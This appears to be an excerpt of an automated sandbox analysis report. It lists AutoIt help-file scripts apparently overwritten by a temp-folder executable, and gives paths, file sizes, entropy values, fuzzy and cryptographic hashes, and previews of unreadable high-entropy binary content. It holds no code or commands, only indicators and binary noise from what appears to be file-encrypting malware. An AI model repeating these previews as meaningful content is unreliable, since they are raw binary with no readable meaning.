                                                                                                                                                                                                                                                SHA-256:6502471A2C8A1C7D89BDF29AA0918B5D98FCBD4EF78C9155E53E1151EB92183E
                                                                                                                                                                                                                                                SHA-512:71748CA016164A17D630D81CDEA9ABCA01D71E8F44DB440283CF91E358C2713132C61B17CA12B40B80EFF39ABC512A9B30C7C744CBDA3318CC0C00151EE1E689
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.EQV..o...}eL.../..DE\.V"0O#.n]|.FG.6I.z~.A$...Y.l.#.r..M{...:...j.....!...m....k.T...^n.@......F..I..O..Q....X..;.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..~...r......D.*~w..9........<@.).w...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\AscW.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):740
                                                                                                                                                                                                                                                Entropy (8bit):7.691350098277672
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:BXNpQAN2mjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZRJiku:BomjmJrc0YXUZtwsTu
                                                                                                                                                                                                                                                MD5:D6DFFBD313D3FE57D39F6B0267544FA9
                                                                                                                                                                                                                                                SHA1:4D3531D9AF689445E0D4A141506B4EA3A28959D8
                                                                                                                                                                                                                                                SHA-256:1AF3046553649A57BC5449D376D7AEE052D09ABD2DF5D97CED9585E9400CA09A
                                                                                                                                                                                                                                                SHA-512:A5956BF81CAD80C5C2EF39BE13340E56698533C0656DB615E0F66D4F1DD52B032163004869F7A26F4D48A57EF8498E690A79E71A3A79F3FEC47F62A12BFBE8B1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...i0.....%!...p#Hd'.K....CqL.=..t..!......]...<.xX.G.....b.....iM@..b4.C..3U...T.v!...`...L.Dk!..l...S....&'8B.........o...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.....q-.n.j.p.<.T.x...[L..g)P.j........................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Assign.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1030
                                                                                                                                                                                                                                                Entropy (8bit):7.767457376893201
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:yPuHmB2EUhUNYUGMHC6xXn1uiN6jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDW:ymHw2EUhyntNsfjmJrc0YXUZtwsT40tf
                                                                                                                                                                                                                                                MD5:F042D3FD2A40FB912C186DC3882C24B2
                                                                                                                                                                                                                                                SHA1:7B52F50F5824059D3E6A49816861D21705523938
                                                                                                                                                                                                                                                SHA-256:5A90147F94EC568114DC3E69E0BC963B5417249F4B638E01E2EEF2C2C34DE544
                                                                                                                                                                                                                                                SHA-512:B9BF41DF10CF7176BED20A632BEE611EFDDABF28E761D5728FBD1ED82B602AC1E233BF0A6D1B7CC875ACC87B77401813C1A84A77D1894219B6DF0FAC6E078369
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:}.X.l..8.`W.3..I.;Y.=.F...q.[...M...B#.D....b/...c@.f...xJ....g\.......S`.....+O.*.F........~j..)1c..G...0....C#Wb.......Kj.`/.. ...x.|..}...V...'..;.E...klJ....n....do_....[.d..v.....d......$.Z.(.pu.%.....$....#k...F.m.`.S...L.._....St.^...&...o.r8..[....f...H<...P.......,.P8...c..... d."Ig.........w.a...>.[v2.?.h(...e.('.P..u.G...... #u.F....z....}&....5\.zp!..wN..-.F..}................f.W.98.0R..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...Z0....\5....h2...b... ....X.{H..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\AutoItSetOption.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2388
                                                                                                                                                                                                                                                Entropy (8bit):7.899826862262204
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:G9ggGe64hiRq1Pk4a0em7JhjLrXKZ9eSqQk524o0jZtwXVQZ:GDROqG/m7XjLDKZ9eSSLleXVI
                                                                                                                                                                                                                                                MD5:82E07E6F20E3BCB0ADB79691124518B4
                                                                                                                                                                                                                                                SHA1:C2798452ADCD0DEA800AFAFF625FCBD19C30240D
                                                                                                                                                                                                                                                SHA-256:128209B79D4AB26DEC63E99799515373EEBFFE3D695BD1B3D6F72580CCAE7904
                                                                                                                                                                                                                                                SHA-512:48BF4DB5F62E9A8B178C3A26671A0BEFF65626E89C0E6AFD8C40DC706106994EEA753645E0AAAC72B654CB8B88D7B94332602BAC6F3E569DF10B6CB82150F8CC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:L@.."e........*XvP>]......d.%......i.<........,..k..Z.g...ny.l..8!4.....y..b..<....H......W..3./.n.{...kU..Cr_i<.!........([U%.7.....C.>.....`.U..G....9.um.]B;.t=.....p7,B-..(}......P .B...](.;"-@.<.-...rS......O...b..F...O....8-.'..Z...).........)N.%.w.l..I..;l.....R.?......0......n.0.....yl...F.[....P..I......%.....sz..;.<#`!=...?..+."q\..:j.=..R.o'.q....x..O5..v].)~..u F.2....<7.....R.x./.n.....&F...bV....5{.kJ..(...Wj.@>...b.....".1i.u..I.x...)s*.3....m..U..3..Dz.......Yh..h.......xrl:....^|....~.\..W.F..=._..>...}........D+.9q.ai..C....m...#..;.X="...m.......]........@..L.q,H..l~.s...ir...x..W3.@...8.P.^K..Z+.._c....s.n'.gT#I....+.C'Z9O.7..f.6./.m....sML0....nf>`.l0...T..........Y..A.....`.nA....L-M.... ...+L.5u.\...P..V....+........H...5.,p}oy..v.4$E.'..R(...(......|...s.i.DA....^@....n..%.,..2&..n?..tL^......T..>..,X>..U...Rh...LF.....j.3....9....X.GK........,...v.#.c..|..a..w..Y.Y..^?.P..l.C.-....P...!...S.8.......n..Z

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\AutoItWinGetTitle.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1513
                                                                                                                                                                                                                                                Entropy (8bit):7.860984651615678
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:eOapds3Z9xJIc3eQjWHILM41CahYaOg4EKNxjmJrc0YXUZtwsTZa:eOapds3345HIpgaqzB4o0jZtwSa
                                                                                                                                                                                                                                                MD5:65E8FBB1E74AA51B75254F1A492900D9
                                                                                                                                                                                                                                                SHA1:53BD487308CCCF4CEF5641CE32CE1D9DD12A79BC
                                                                                                                                                                                                                                                SHA-256:F91B38567D98CB08D0A2354E30AB055713D891E7B1BB3B4871AC3BC36F92A2CD
                                                                                                                                                                                                                                                SHA-512:84E9C1D2363A8B622879CBA6BF76733711D96F7FDDE42CC76AFA6A3963EEAB35F00F7405FBF6709E99CEB5B0A885E52FEEE51FBBB5D755C508A02CB7027D15F0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..YW@...e!.9.Y.a...n.<.....T.8..%VR.e.e..v.B6.C.S..z.W.a./...K..y......P1..h..9...0yC..U.T_mY.....G...q&.M$.}...~..Y.{\.......8:I....._u{.o5F..8)..|.G.m#L.y..1....Q8.F....p2.3../..b...-..._......j...&.c.. T.+]...j)6...m..4.rG.....bM.........@v +.......c.....1..U..Z.1..u...E..n1.(...;#...lZG..S...%y....3...t#..G...2g..lx...F@N.........T..d/k..A..'.3..E..S..R,......=&.g..w<LhY...o..-WU.$..u.x(e....w.......])-N..`T.B+jFOg.^...{......p......~."_../.V#.:d......6.y.U..v!....\.V.....g.Qy.8L0..]N/V.......Rk.f.f..\.[I.@..V..zXr..ph...T....x.8..ow.T.XQ.e...A^.a}........l.U...u....S.e.'..l.-.......!i..@.6!B...(.oA...H...t.3....r~*..<..Ip...3z.V....I...C.$...V..~.7..j.n.\GS.p6.9%.Df.Ncy..!.(..667......r..p...;..6_......*.<{..........68.|....;.....e......_.....PY.~.KT....1.(....@..L..}....8#6Ki....F...-.....@...|?.u%...rB@$..4)R6..(+-.,_.?.3SV.H...S.. /.|...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\AutoItWinSetTitle.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1451
                                                                                                                                                                                                                                                Entropy (8bit):7.856409650790485
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:BJsSEsyhMxV+dkGjYqnIHaXHpNzESXrRxmOjmJrc0YXUZtwsTS+p:BJsSE/2HsHpNzjXbH4o0jZtwx+p
                                                                                                                                                                                                                                                MD5:DAD1CF18A7AACB72C69859A594C7C29C
                                                                                                                                                                                                                                                SHA1:4C5CBFCB6532D0C1FB9D94D34C11CAA22071AF14
                                                                                                                                                                                                                                                SHA-256:90ACF1C468B153DBEECF8E547F52200F57AC0B893C17486C3234D6B6A18AA606
                                                                                                                                                                                                                                                SHA-512:C57611D878A030A1D4D7280DFF1A66EF391ED68D2AB2BD7F21B2E4C010F93BD5589F27B55AE7F347DA321ADB44D6B6CF48893C35F2BC0ADB6B917D3412B2A457
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......hS...@..x..z....< m...-`"..Li..k?...d..\q.bS`>..r.C[.4....]".h....b...n^.I..w./.N..........)......I ....A..}.<..+....8i....Yy.Z...&].[.={.........)g.?.2N.XS.....$@D.....]u..G...V.R....eiT...}..!...\Q..a]...........'.aHR0Z..K+mF....[.$...S.4,>.z..Y\.&N.C.=D....%..L..>....b........c....j$.d.n.:.2...?.C7.3..d..t'.;.......{K.3...I-.n..j.....Cj..n....(E...H...FW.pxh4(..%%K.U....F.N..........{l(..A.q..G.v.*6.:...P..<Db..Ad..0....|z....a.L....#?....:.k..),.D...;:)o.O8k..~.....K.=.n..d.!c..+..kPG......+....\{.....I..-&....sN....I.....<...._..|.u..e....!.&.G.....B..P.3....W ..LK..c...$.d....y....yg.I5.1R...J.t......!.6..$Z!...!`.O.ok...pG.%xIF......^.7Tjg..M..)Q%`............f.r.....R..g!....D....ZC+.g.^v1.$2..4i....U........d8\.............RX......:....xH)>....-_.H2..T...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.)...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\AutoItWinSetTitle[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1513
                                                                                                                                                                                                                                                Entropy (8bit):7.866278495076296
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:oatU8ANjaGcYlfYVg3p+R5PjHRT5+gKvZzCx0ejmJrc0YXUZtwsTsp:pANjNbn5ojRT5+gKV64o0jZtwxp
                                                                                                                                                                                                                                                MD5:17822D079071BE64BA061BF80216B9EE
                                                                                                                                                                                                                                                SHA1:B9AAB0EF4CF9B648666672BAA7AD6E20110C7CE8
                                                                                                                                                                                                                                                SHA-256:3F2A721511F685B61BF72AB108F59E64676F6B7CB334CAFD5D777D2ED81421E6
                                                                                                                                                                                                                                                SHA-512:8B0574C15FC01C15E8354744C2E26D8EFD6EF6D27F53D0D115040E72A62021FDFA454FE38C965CB7FBCC1129A2D60BD1D28B73E3764D68D76CE5FF2DC034F3C7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:H/.z..TOj#.V....J.&...._..)z.;.~...[..uE..o.*..."..&Z...............t.$..I=..Y...1wu.X.......n.pu.F..5.0u....,.EXW..?...b.S/....x.?.;.../..W..!.,:..).e....^....j.R......t+.1"..GQ..Mq..g#.1..D.g... ."~.xe.1.....FN.&...#.2...A.C+...B..>....S.=....@SQ.....5..|....!.*..;......<.......m..1.......2.."4..?^........m.......-...Y#..+..Ni+....)b.&..y..0..)JE(n.2(...#......8..I_.. ..z[..au?.........*."......p....t........Z.27>..W..-[..v.j....+Ku....b.:6w..i~}.s.{...v..2..B3[1..M.&U.+........ .w....G...u......o.......z....*...<..Y."R..*.....].&.1;.m..}P9.......6.I.8..P.....y.iK.IJ?.z.....-..rOy..y.G.X...o.1.AR..06.. .....K...f..".id{../....3q....T.8....nJ-.....|.....Q..T...fA.jv.H9\.~...Z....WI..Y.}....z.......b.. .Lh.%e..............L..Rp!ch...]...d{......s..3I9..byR....u....*iK./j5.l......._.1.....T...p.'.WW.Cg....H..q+.c`;F,....L....35.$0{@O...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Beep.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):689
                                                                                                                                                                                                                                                Entropy (8bit):7.673044881198353
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:M49mcEZWyjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZnhBQMku:MOmNZWyjmJrc0YXUZtwsTzhBQk
                                                                                                                                                                                                                                                MD5:8A9F6E754C6EB4695AD51F11C39E5627
                                                                                                                                                                                                                                                SHA1:E828422932435D333667EB7AEA36674CECA664F2
                                                                                                                                                                                                                                                SHA-256:985B229E9FCCCC0C157CA68F4DCA1F20959FA3963BD08011EFA50D83C3AF1A11
                                                                                                                                                                                                                                                SHA-512:C15E3916281338379857EBEB4C82F1290A6AFC13F991510CEB9538EBE806F525E64471122E3FCBEDB3A9F95150FC99A7B16B18B383042DE33A790A989CD96B89
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.U#....6..u..4..K.g..e..&..:?G.x1.%.....V.r%YeC....jB.U3h..<...P..Sb=..D:...l...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.63!....#x..I..y....(...c...Z.yP.Q...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Binary.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):806
                                                                                                                                                                                                                                                Entropy (8bit):7.691633950295935
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:6sR3NEArKYO4ck8mmSKC2jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1W:NdGYO4vm5HjmJrc0YXUZtwsT/03r
                                                                                                                                                                                                                                                MD5:3964E3956478C3414BC9FCB1CBDB4830
                                                                                                                                                                                                                                                SHA1:3DD1448F7FA6951E3B8CBBAAF18690C33C7AD075
                                                                                                                                                                                                                                                SHA-256:E1CBFE6DC94F480401CA740B5402984B782420E8D975D5B9FD277C8F214BE28D
                                                                                                                                                                                                                                                SHA-512:D9DAD141B1392DB8199187978978294FCC5F9F0EC408104A07DFAAEDFCAA9A06E3630DDFF86DC1A505FCE6B4CE12D123445AAD17B447175861AE93B08E377482
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:e-.}..y..MW.{..9)E.........2.K$..YMDcka.R....Y:.j^Y...u..*....Y.q.F..Q_s.b).....\.......'+..*.._.e...&D..8...]..!..g...d...Y."..'s..j....S....5vCv......^....&..oJ.{.UCA.d.A8.w+.......b.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.J...R......cT.P...;s.8.c...z.'vP.......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\BinaryLen.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):801
                                                                                                                                                                                                                                                Entropy (8bit):7.7308335386192795
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1OqGIEL+PCWqBXENCbkwe2jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsOK:1fa+PCWqBUNCbde2jmJrc0YXUZtwsTg
                                                                                                                                                                                                                                                MD5:6C6745A824EA3BCD561D59CB63932C29
                                                                                                                                                                                                                                                SHA1:3CFA69874331B071EDD678D5F01025B7EB501386
                                                                                                                                                                                                                                                SHA-256:06ACCC446110AB9645F0A073880F32D4E673F89A410A4D5B37330BFCFEF37811
                                                                                                                                                                                                                                                SHA-512:0897E53A9C6032C52A17C61D39E02FE7590A1A2E60711E9BE8200E0026FE537B1774E4E48B9368EBFD7C1E509BA8927B4ED2B58D9C196300F028490FBDF75F2F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..C..c.......7]....^b,...aU...!0......0.R}..l.$....E.g.V....%O..O.KN.lY).a. .<.G........WO.x/?R..c4=.... Wu..Q..;%..RB..W.@.i..T.O..../.b.(pv-2.~..3!.2R.)Kxn..y.Y...d.#..rQ.o........!.9d.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.[A.e..?.pzu/..=%.S..F..W..{.}f...#Y....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\BinaryMid.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):834
                                                                                                                                                                                                                                                Entropy (8bit):7.727080218981816
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:XrW1GS3kxX0TSnUljaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZTku:lV+OUljmJrc0YXUZtwsTf
                                                                                                                                                                                                                                                MD5:01FA2F1EE6FF12623C628C1FE90AC82E
                                                                                                                                                                                                                                                SHA1:E1DE2E52C3D0E7303058B11ACC932AEAAF137AFB
                                                                                                                                                                                                                                                SHA-256:AD55A837D98B7A6248485BE2DB8A8AE46C5E07A1EF16514F799283223C5979FF
                                                                                                                                                                                                                                                SHA-512:0E9340E08CBA9507B059676DE22081BDBA3B64E920E7ACCA56AC6F083598096B32A1C8B86560D86AA7317971D2F022BF3357FFA8DE3CBE0E7605FDA20BF63C07
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..S.y....p.3NZ..z...N.A.v.R.. M!...7D..'s.T68N../F.:C..*....S.<dN...;~..]..,.G....]..fO.#.fIY....@.b..5\.z.P4.3./...(...6.+:.v.DD.e8>.Z.$"ij=....e.:......v...@z.?....:Gy. .6.n.....k....-.9J.k....j\..0Q.t.x3!...z.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.No...!..\.*..ga|..R..LV..k.$k>R.Q.......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\BinaryToString.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3361
                                                                                                                                                                                                                                                Entropy (8bit):7.944700139126812
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:IOZaES6Gp3eCd9y8/7C5ajJIP9wOI2Az9CWMHHH6ZfBF4o0jZtw5:H66GppyugaGlpApCWcHCfBule5
                                                                                                                                                                                                                                                MD5:62458B74F4577C6724887B00904EA85F
                                                                                                                                                                                                                                                SHA1:5391120D54DDEB1025D1A306E43C639EEBD05B0E
                                                                                                                                                                                                                                                SHA-256:AADE547E4E56F8927E82DA2B173C1DFDDFA966500429C4C069516DB3CFE0ABCB
                                                                                                                                                                                                                                                SHA-512:6C459E2DB823B0DEE09668C2C2C1DDD391E57FE1DF082CD5D52652D76745045CD3100CD43B702C8DDBF1D34D56B30C5AE28D68C97C157836DE86260E4700AE55
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.7..T..*.c.[....k....<./Q.t.MB....3.......MQ...^.....]..2..Q.(..z{T....qzt.".].8....h.a.8NS......#J.........h...=.....:>.Ot....I.h.e=..F.....R...(E.......x}c..h.Qp)...%.;U..;......<.._h.....C...h..X..YN.h.Q...{L...iI...o.Z8..G.).+..F.`.L.+l...!..X..n...c.>...R...W.X.Q......l....r......&..V."..S.Oe..'j. ..T(.X.....]../...%...P..l=Y:.W...X.M...../...6@..#.@.R 0.jK..^VD.8.~H...`...R..} ..sh..=.....r#}....h.-..-..j..!H...Y`_...J.0..J.g".AK..eY:..i.....DD....;..b7T.6...M.V.xro..}.....J).N.a....w.......v..Z9.A\P..e].E[|..}.&....pa...6....>u,...Tr........n......hp...(&.Qu..C.k...Y......O......T..PQ5i....fFR.. .n^.' .1\....k.0.+.*hPxa._.+..q.z...9p.....gx.<J...y|...W...5B.M....yR.....;sp.]..by.N.z.W..*...H.d......T(J.a/M.vn.qh..8..OVY.I.. s&^.....E8...).....[.]..R..$..R't.......d.......[.?..l....A*.H3v.4.y.2. T..;.......4*.U*.e.D.M.[.HQ...Trd.t.%Y.]~_....l....6.3...#Xq'..+!.!~...........JW.?.p}..W..m.$"...)gX.f.!-..b. 8...e.P...........

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\BitAND.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1514
                                                                                                                                                                                                                                                Entropy (8bit):7.868248858978245
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JD5mjCQfhLqpfiFiSHGhvsKY2+2pCxvy0JKjmJrc0YXUZtwsTslC:B53QZmqiSHG+Z2lpKyj4o0jZtwpC
                                                                                                                                                                                                                                                MD5:007B5E9F355D05A7AD15DFB1999EA2B0
                                                                                                                                                                                                                                                SHA1:EBB37B5A650671F2A6C869595D73E18709121FE6
                                                                                                                                                                                                                                                SHA-256:7696723D4A92A877365EAA1F606B953B66CA605AAB5537F3A95D0488AC8B5AD9
                                                                                                                                                                                                                                                SHA-512:53D988A97D7B94C9402EC6A762D36724F25BDC70F005BE6DAA2C886812835085B380BEDF279EC9460755536179C93FC1260761E82E3F7C09D4A6105E317D6ED1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
